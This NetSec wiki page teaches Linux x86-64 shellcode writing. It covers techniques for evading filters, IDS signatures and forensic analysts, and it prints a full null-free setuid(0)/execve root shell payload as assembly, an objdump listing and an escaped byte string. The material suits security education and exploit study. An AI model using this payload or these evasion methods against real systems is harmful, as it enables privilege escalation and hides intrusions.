Difference between revisions of "Category:Shellcode"

From NetSec

Revision as of 03:56, 1 December 2012

Shellcode, also known as bytecode, is machine code (binary represented in hexadecimal) which can be used for buffer overflow exploitation, and is usually represented to humans in assembly. Machine code can be used by a programmer to write any application from an assembly approach (as it is just as powerful as any other programming language), though unlike other languages it is usually (but not always) limited to a single operating system and instruction set architecture.

Writing shellcode requires a basic understanding of bitwise math, Linux assembly, and stack overflows.


Introduction

Every programming language is eventually expressed in binary, either at compile-time or runtime. When writing a buffer overflow exploit, there are many potential obstructions from security infrastructure (such as DEP, ASLR, firewalls, or IDS and IPS appliances) to keep in mind; filter bypass and IDS evasion techniques may be needed for successful exploitation past modern countermeasures.

This article assumes that the user has access to some form of Linux or Unix bash environment with the standard GNU core utilities installed. In some cases, stub examples can be tested or run using OllyDbg or IDA Pro. The articles in this category contain small snippets of code taken from the examples found in the appendix; the shellcode and associated object files in this article are also contained in shellcodecs.

Types of shellcode

Many different types of shellcode may be utilized depending on the target environment for the execution of the code. Different types of countermeasures at different levels of the OSI model require different techniques for successful exploitation of a given application's vulnerability.

Executable vs. Return-oriented

There are primarily two types of shellcode from a runtime perspective: executable shellcode and return-oriented shellcode. The type required for successful exploitation is dictated by the target environment's ability to execute a data stack. If properly targeted, return-oriented shellcode should work regardless of the stack's ability to execute, while executable shellcode will work exclusively on executable stacks.



  • Return oriented shellcode utilizes return oriented programming in cases when the vulnerable buffer is non-executable. This is usually performed by constructing a call stack formatted in a similar fashion to that generated by an ordinary compiled application which then triggers the execution of executable shellcode. Because the call stack is treated as data, this bypasses the need for an executable stack during exploitation.


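Certain instruction set architectures, such as MIPS, keep the return address of a call in a link register instead of pushing it onto the stack, which changes how return oriented programming and traditional stack overflows apply to them. Non-leaf functions on these architectures still save that register to the stack, so the return address is not always out of reach.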

Countermeasures and environmental hostility

While traditional binary shellcodes will normally work unencumbered for unsanitized, unpatched, or larger inputs, many target environments and applications have limiting factors that serve as obstacles to traditional machine code. Most applications written in C or C++ treat a null byte as the end of a string, so they require that the machine code be null-free; this is why null-free shellcode is the traditional basic form of executable shellcode programming.

  • Character filters can be evaded by using polymorphic (self-modifying) code to reconstruct bytecode outside of the allowed character set during runtime. Most character filters restrict characters to the printable keyspace, and so ascii shellcode and alphanumeric shellcode have become prevalent means of circumventing them.
  • Character encoding can be bypassed by encoding the payload so that it will decode to the proper hexadecimal machine code. Code will often have to survive unicode, base64, case conversions, or other decoding before being copied into the vulnerable buffer.
  • Buffer size may be incredibly limited and can require second-order-injection in circumstances in which the payload is too large to fit into the vulnerable buffer. As a result, a shellcode's size is traditionally kept to a minimum for optimal re-usability.
  • Firewalls can obstruct remote shellcodes by preventing new outbound connections from being formed or preventing new listening sockets from receiving traffic. Bypassing firewalls has been accomplished by utilizing file-descriptor re-use.
  • Analysts may be debugging the vulnerable application in an attempt to reverse engineer the exploitation process. int3 breakpoint detection and one-way hashing have been demonstrated to evade volatile forensic analysis tools (such as volatility).
  • Signatures are a particular obstacle for Linux shellcode because syscalls are traditionally used in place of a linked C interface, which makes them the most static part of any given shellcode. Even polymorphic codes usually unpack into shellcodes containing syscalls. Syscalls can be removed using self-linking code.
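
The null-free and character-filter constraints above can be checked mechanically before a payload is used. The following is a minimal sketch in Python, not part of the original toolchain: the helper names `bad_bytes` and `is_alphanumeric` are hypothetical, and the byte string is the 34-byte payload extracted later in this article.

```python
import string

# The 34-byte payload from this article, written as plain hex.
PAYLOAD = bytes.fromhex(
    "4831ff6a69580f0557575e5a48bf6a2f62696e2f736848c1ef0857545f6a3b580f05"
)


def bad_bytes(payload: bytes, forbidden: bytes = b"\x00") -> list:
    """Return the offset of every byte the target would reject (hypothetical helper)."""
    return [i for i, b in enumerate(payload) if b in forbidden]


def is_alphanumeric(payload: bytes) -> bool:
    """True only if every byte is an ASCII letter or digit (hypothetical helper)."""
    allowed = (string.ascii_letters + string.digits).encode("ascii")
    return all(b in allowed for b in payload)


print(bad_bytes(PAYLOAD))        # offsets of null bytes, if any
print(is_alphanumeric(PAYLOAD))  # whether an alphanumeric-only filter would accept it
```

Passing a different `forbidden` set (for example `b"\x00\x0a\x0d"`) models a target that also cuts input at line breaks; which bytes are actually rejected depends on the vulnerable application.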

Shellcode mechanics

Shellcode is usually written first in assembly language. While it is possible for one to memorize an opcode table and write direct machine code by hand, this is not usually suitable for beginners and therefore is not recommended.

Environmental factors

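  • Many applications and security infrastructure components will partially filter inputs, restricting the possible instruction set. Sometimes this will even interfere when overwriting the return address during exploitation.
  • Operating systems handle the C API a bit differently. Normally (but not always) shellcode for Linux relies on kernel interrupts for unlinked calls, while Microsoft Windows does not provide an interrupt API and shellcode must therefore utilize PE parsing to perform its own linking at runtime.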

Assembling the code

Create a text file named test_shellcode.s.

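This example will use hatter's null-free 32-byte payload for setuid(0); execve('/bin/bash',null,null). The path is '/bin/bash' rather than '/bin/sh' because the two pushed values spell out '/bin/bas' followed by 'h'. Copy the following code into test_shellcode.s, then save it: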

 
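# 32 bytes
.text
.globl _start
_start:
  xor    %rdi,%rdi                  # zero %rdi (first argument: uid 0)
  pushq  $0x69
  pop    %rax                       # %rax = 0x69, the syscall number for setuid()
  syscall                           # setuid(0);
 
  push   %rdi
  push   %rdi
  pop    %rsi
  pop    %rdx                       # zero %rsi and %rdx (second and third arguments)
  pushq  $0x68                      # push 'h' followed by seven null bytes
  movabs $0x7361622f6e69622f,%rax   # 'sab/nib/', stored in memory as '/bin/bas'
  push   %rax                       # the stack now holds '/bin/bash\0'
  push   %rsp
  pop    %rdi                       # %rdi is now a pointer to the path string
  pushq  $0x3b
  pop    %rax                       # %rax = 0x3b, the syscall number for execve()
  syscall                           # execve(path, null, null);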
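
The string that the two pushes build can be confirmed without running the payload. This is a small illustrative sketch in Python, assuming only that x86-64 stores values little-endian and that the stack grows downward; the variable names are made up for the example.

```python
import struct

# Immediates copied from the listing above.
PUSHQ_IMM = 0x68
MOVABS_IMM = 0x7361622F6E69622F

# Little-endian: the least significant byte lands at the lowest address.
high_qword = struct.pack("<q", PUSHQ_IMM)   # pushed first, ends up at the higher address
low_qword = struct.pack("<Q", MOVABS_IMM)   # pushed second, %rsp points here afterwards

stack = low_qword + high_qword              # memory as read upward from %rsp
path = stack.split(b"\x00", 1)[0]           # a C string ends at the first null byte

print(low_qword)
print(path)
```

The null terminator comes for free from the sign-extended `pushq $0x68`, which is why this variant needs no shift instruction.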
 

When creating shellcode on a Linux platform, the source file can be assembled using the GNU assembler:

Terminal

localhost:~ $ as test_shellcode.s -o test_shellcode.o

Extracting the shellcode

Once the shellcode has been assembled, the bytecode can be read out of the object file using objdump, the GNU binary object dumper:

Terminal

localhost:~ $ objdump -d test_shellcode.o

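The middle column contains the instruction bytes corresponding to the assembly on that line. Most debuggers also show a hexadecimal representation alongside the disassembly of the debugged application. The listing below was produced from the earlier 34-byte '/bin/sh' revision of the payload, which loads the string through %rdi and a shr instead of the pushq and movabs pair in the 32-byte source: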

user@host:~$ objdump -d test_shellcode.o

test_shellcode.o: file format elf64-x86-64


Disassembly of section .text:

0000000000000000 <_start>:
 
   0:	48 31 ff             	xor    %rdi,%rdi
   3:	6a 69                	pushq  $0x69
   5:	58                   	pop    %rax
   6:	0f 05                	syscall 
   8:	57                   	push   %rdi
   9:	57                   	push   %rdi
   a:	5e                   	pop    %rsi
   b:	5a                   	pop    %rdx
   c:	48 bf 6a 2f 62 69 6e 	movabs $0x68732f6e69622f6a,%rdi
  13:	2f 73 68 
  16:	48 c1 ef 08          	shr    $0x8,%rdi
  1a:	57                   	push   %rdi
  1b:	54                   	push   %rsp
  1c:	5f                   	pop    %rdi
  1d:	6a 3b                	pushq  $0x3b
  1f:	58                   	pop    %rax
  20:	0f 05                	syscall 
 

The hexadecimal in the middle column is the bytecode for the executable segment. To make this into "shellcode", place a \x prefix before each byte, like so:

\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05
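
Copying the middle column by hand is error-prone, so the conversion can be scripted. The sketch below is one possible approach in Python, assuming the tab-separated layout that objdump -d prints (address, bytes, mnemonic); the function names `extract_bytes` and `escape` are hypothetical, and only three lines of the listing are embedded to keep the example short.

```python
# Three lines from the listing above, including the continuation line that
# objdump emits when an instruction is longer than seven bytes.
LISTING = (
    "   c:\t48 bf 6a 2f 62 69 6e \tmovabs $0x68732f6e69622f6a,%rdi\n"
    "  13:\t2f 73 68 \n"
    "  16:\t48 c1 ef 08          \tshr    $0x8,%rdi\n"
)


def extract_bytes(listing: str) -> bytes:
    """Collect the hex byte column from objdump -d style lines."""
    out = bytearray()
    for line in listing.splitlines():
        fields = line.split("\t")
        # Instruction lines start with an 'offset:' field; headers have no tab.
        if len(fields) < 2 or not fields[0].strip().endswith(":"):
            continue
        out += bytes.fromhex(fields[1].strip())
    return bytes(out)


def escape(payload: bytes) -> str:
    """Format raw bytes with a \\x prefix before each byte."""
    return "".join(f"\\x{b:02x}" for b in payload)


print(escape(extract_bytes(LISTING)))
```

Feeding the full listing through the same two functions should reproduce the complete string shown above.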

If desired, it can be turned directly into binary using perl's print statement, "echo -en" in bash, or another interpreted language.
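
As an illustration of the "other interpreted language" route, the following Python sketch turns the escaped string back into raw bytes and writes them to a file. The helper name `unescape` is hypothetical, and a temporary directory is used here only so the example does not overwrite anything; any output path would do.

```python
import re
import tempfile
from pathlib import Path

# The escaped payload string from this article.
ESCAPED = (
    r"\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62"
    r"\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05"
)


def unescape(text: str) -> bytes:
    """Convert a string of \\xNN escapes into the raw bytes they name."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))


raw = unescape(ESCAPED)

# Write the raw bytes to a file, as "echo -en ... > shellcode" would.
out_path = Path(tempfile.mkdtemp()) / "shellcode"
out_path.write_bytes(raw)

print(len(raw), "bytes written to", out_path)
```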

Shellcode Disassembly

Many times you may come across shellcode in the wild, for example when analyzing malware or the newest exploit. You may want to disassemble the shellcode to learn what it does; the easiest way to do this is with objdump. In this example we'll use the 34-byte code extracted above, billed as the shortest 64-bit setuid() shell online:

 ╭─user@host ~  
 ╰─➤  echo -en "\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05" > shellcode; objdump -b binary -m i386 -M x86-64 -D shellcode
 shellcode:     file format binary
 Disassembly of section .data:
 00000000 <.data>:
   0:	48 31 ff             	xor    %rdi,%rdi
   3:	6a 69                	pushq  $0x69
   5:	58                   	pop    %rax
   6:	0f 05                	syscall 
   8:	57                   	push   %rdi
   9:	57                   	push   %rdi
   a:	5e                   	pop    %rsi
   b:	5a                   	pop    %rdx
   c:	48 bf 6a 2f 62 69 6e 	movabs $0x68732f6e69622f6a,%rdi
  13:	2f 73 68 
  16:	48 c1 ef 08          	shr    $0x8,%rdi
  1a:	57                   	push   %rdi
  1b:	54                   	push   %rsp
  1c:	5f                   	pop    %rdi
  1d:	6a 3b                	pushq  $0x3b
  1f:	58                   	pop    %rax
  20:	0f 05                	syscall 
 ╭─user@host ~  
 ╰─➤
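
When reading a disassembly like the one above, large immediates are often the quickest clue to what the code does. The sketch below, in Python and with made-up variable names, decodes the movabs value and applies the same 8-bit right shift as the shr instruction to show how this variant null-terminates its string without containing a null byte.

```python
import struct

IMM = 0x68732F6E69622F6A   # movabs immediate from the disassembly
shifted = IMM >> 8         # shr $0x8,%rdi drops the low byte and zero-fills the top byte

# Pack little-endian to see the bytes as they would sit in memory after a push.
before = struct.pack("<Q", IMM)
after = struct.pack("<Q", shifted)

print(before)
print(after)
```

The leading 'j' (0x6a) is padding that keeps the encoded instruction null-free; the shift discards it and leaves a zero in the highest byte, which becomes the string terminator once the register is pushed.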

